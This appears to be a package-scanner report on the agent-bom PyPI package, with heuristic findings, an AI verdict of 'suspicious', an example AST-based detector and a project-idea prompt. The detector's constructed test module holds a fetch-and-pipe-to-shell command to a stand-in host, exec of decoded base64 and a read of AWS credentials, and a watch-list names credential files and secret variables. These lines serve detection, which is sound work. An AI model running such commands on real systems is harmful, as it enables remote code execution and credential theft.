agent-bom

v0.88.5 suspicious
4.0
Medium Risk

Open security scanner and self-hosted control plane for AI/MCP infrastructure.

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package has a moderate risk score due to incomplete metadata and network calls, though no direct evidence of malicious activity was found.

  • Incomplete author metadata and potentially new/inactive account
  • External network calls requiring further investigation

Per-check LLM notes
  • Network: The package makes external network calls which could be legitimate depending on its functionality, but requires further investigation into the purpose and destinations.
  • Shell: No shell execution patterns were detected.
  • Obfuscation: No obfuscation patterns detected, indicating low risk of malicious intent.
  • Credentials: No credential harvesting patterns detected, suggesting safe handling of secrets and credentials.
  • Metadata: The author's information is incomplete and the account seems new or inactive, raising some concerns but not definitive signs of malice.

🔬 Heuristic Checks

Outbound Network Calls score 9.0

Found 6 network call pattern(s)

  • httpx.get(jwks_uri, timeout=10.0, follow_redirects=False)
  • httpx.get(discovery_url, timeout=10.0, follow_redirects=False)
  • httpx.get(f"{OLLAMA_BASE_URL}/api/tags", timeout=2.0)
  • httpx.get(f"{OLLAMA_BASE_URL}/api/tags", timeout=2.0) (second occurrence)
  • async with httpx.AsyncClient(timeout=120.0) as client: resp = await client.po… (call truncated in the scanner output)
  • async with httpx.AsyncClient(timeout=120.0) as client: resp = await client.po… (call truncated in the scanner output)

What the snippets show: two fetches of a JWKS URI and a discovery URL (the variable names point at OIDC/JWT key retrieval), two GETs against an Ollama endpoint whose host comes from OLLAMA_BASE_URL, and two async client calls whose target is cut off in the scanner output. The explicit timeouts and follow_redirects=False are the conservative settings for such fetches; the open question for review is where the AsyncClient calls post to and what they send.

Code Obfuscation

No obfuscation patterns detected

Shell / Subprocess Execution

No shell execution patterns detected

Credential Harvesting

No credential harvesting patterns detected
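The four per-check notes above (network, shell, obfuscation, credentials) describe pattern checks without showing what one looks like. The block below is an added example written for this page, not agent-bom's code and not the scanner that produced these results: a small AST-based pass over Python source that reports outbound network calls with their destination expression and timeout/redirect settings, shell or subprocess execution, obfuscation hints (exec/eval over decoded blobs, long base64-like literals) and credential-file or secret-variable references. The module text it scans is constructed for the demo and only mimics the shape of the calls quoted above; the call tables and regexes are assumptions about what is worth flagging, not a published rule set.

```python
"""Added example: AST heuristics of the kind summarised in the checks above.
Not agent-bom's code; the scanned SAMPLE module is constructed for the demo."""
import ast
import re
from dataclasses import dataclass, field

# Assumed watch-lists (illustrative, not a published rule set).
NETWORK_CALLS = {"httpx.get", "httpx.post", "httpx.AsyncClient", "requests.get",
                 "requests.post", "urllib.request.urlopen", "socket.create_connection"}
SHELL_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
               "os.system", "os.popen"}
OBFUSCATION_CALLS = {"exec", "eval", "compile", "base64.b64decode",
                     "marshal.loads", "zlib.decompress"}
CREDENTIAL_RE = re.compile(
    r"\.aws/credentials|\.ssh/id_|\.npmrc|\.pypirc|\.docker/config\.json"
    r"|AWS_SECRET_ACCESS_KEY|GITHUB_TOKEN", re.I)
LONG_BLOB_RE = re.compile(r"^[A-Za-z0-9+/=]{200,}$")  # base64-looking payload


@dataclass
class Findings:
    network: list = field(default_factory=list)
    shell: list = field(default_factory=list)
    obfuscation: list = field(default_factory=list)
    credentials: list = field(default_factory=list)


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def describe_dest(node):
    """Classify the destination argument: literal URL, f-string, or dynamic."""
    if node is None:
        return "no destination argument"
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return f"literal {node.value!r}"
    if isinstance(node, ast.JoinedStr):
        return "f-string: " + ast.unparse(node)
    return "dynamic: " + ast.unparse(node)


def kw(call, name):
    """Source text of keyword argument `name`, or None if absent."""
    for k in call.keywords:
        if k.arg == name:
            return ast.unparse(k.value)
    return None


def scan_source(source: str) -> Findings:
    f = Findings()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in NETWORK_CALLS:
                dest = node.args[0] if node.args else None
                f.network.append({"line": node.lineno, "call": name,
                                  "dest": describe_dest(dest),
                                  "timeout": kw(node, "timeout"),
                                  "follow_redirects": kw(node, "follow_redirects")})
            elif name in SHELL_CALLS:
                f.shell.append({"line": node.lineno, "call": name,
                                "shell": kw(node, "shell") == "True"})
            elif name in OBFUSCATION_CALLS:
                f.obfuscation.append({"line": node.lineno, "call": name})
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if CREDENTIAL_RE.search(node.value):
                f.credentials.append({"line": node.lineno, "value": node.value})
            if LONG_BLOB_RE.match(node.value):
                f.obfuscation.append({"line": node.lineno,
                                      "call": "long base64-like literal"})
    return f


# Constructed input: mimics the call shapes quoted above plus deliberately
# suspicious lines so every check fires.  Not agent-bom source.
SAMPLE = '''
import base64, httpx, os, subprocess

OLLAMA_BASE_URL = os.environ.get("OLLAMA_BASE_URL", "http://localhost:11434")

def fetch_jwks(jwks_uri):
    return httpx.get(jwks_uri, timeout=10.0, follow_redirects=False)

def ollama_models():
    return httpx.get(f"{OLLAMA_BASE_URL}/api/tags", timeout=2.0)

async def post_result(payload):
    async with httpx.AsyncClient(timeout=120.0) as client:
        return await client.post("https://example.invalid/report", json=payload)

def bad_things():
    subprocess.run("curl https://example.invalid | sh", shell=True)
    exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
    return open(os.path.expanduser("~/.aws/credentials")).read()
'''

if __name__ == "__main__":
    for category, hits in vars(scan_source(SAMPLE)).items():
        print(category, hits)
```

Two limitations worth knowing before trusting such output: the pass matches on the static dotted name, so `client.post(...)` on an `httpx.AsyncClient` instance is only caught through the client construction, which is exactly why the page's snippets end at `client.po…` and why a reviewer still has to open the file to see the POST target; and a "dynamic" destination like `jwks_uri` is neither good nor bad until you trace where the value comes from (a config file the operator controls versus something received over the network).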

Typosquatting

No typosquatting candidates detected

Registered Email Domain

Email domain looks legitimate: gmail.com

Suspicious Page Links

All external links appear legitimate

Git Repository History

Repository msaad00/agent-bom appears legitimate

Maintainer History score 4.0

2 maintainer concern(s) found

  • Author name is missing or very short
  • Author "" appears to have only 1 package on PyPI (new or inactive account)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with agent-bom
Create a comprehensive security dashboard application using the 'agent-bom' package, which acts as an open security scanner and self-hosted control plane for AI/MCP infrastructure. Your task is to develop a user-friendly web interface where users can input their AI/MCP infrastructure details and receive real-time security insights and alerts.

### Step-by-Step Guide:
1. **Setup Environment**: Begin by setting up your Python environment and installing the necessary packages including 'agent-bom'. Ensure you have Flask or Django installed for web development purposes.
2. **Define Infrastructure Input**: Design a form within your web app that allows users to input details about their AI/MCP infrastructure such as IP addresses, ports, and specific services they wish to monitor.
3. **Integrate 'agent-bom'**: Use 'agent-bom' to scan the infrastructure the user described for potential security weaknesses, driving its scan functions from the form inputs. Check the package's own documentation for the supported scan targets and entry points rather than assuming it accepts raw IP addresses and ports.
4. **Generate Reports**: Once the scanning process is complete, generate a detailed report that highlights any identified vulnerabilities, their severity, and recommended actions.
5. **Real-Time Alerts**: Implement a feature that sends real-time alerts to users via email or SMS if critical vulnerabilities are detected during the scan.
6. **Dashboard Interface**: Develop a clean and intuitive dashboard where users can view the status of their scans, access reports, and manage alerts.
7. **User Management**: Add functionality for user registration and login to allow multiple users to manage their respective infrastructures through the same platform.
8. **Testing & Deployment**: Thoroughly test all components of the application before deploying it to a live server.

### Suggested Features:
- Automated periodic scans based on user-defined schedules.
- Integration with external vulnerability databases for more accurate assessments.
- Historical data tracking and comparison to monitor changes over time.
- Detailed documentation and user guides for easy setup and use.

By following these steps and incorporating the suggested features, you will create a robust and user-friendly tool that leverages the capabilities of 'agent-bom' to enhance the security posture of AI/MCP infrastructures.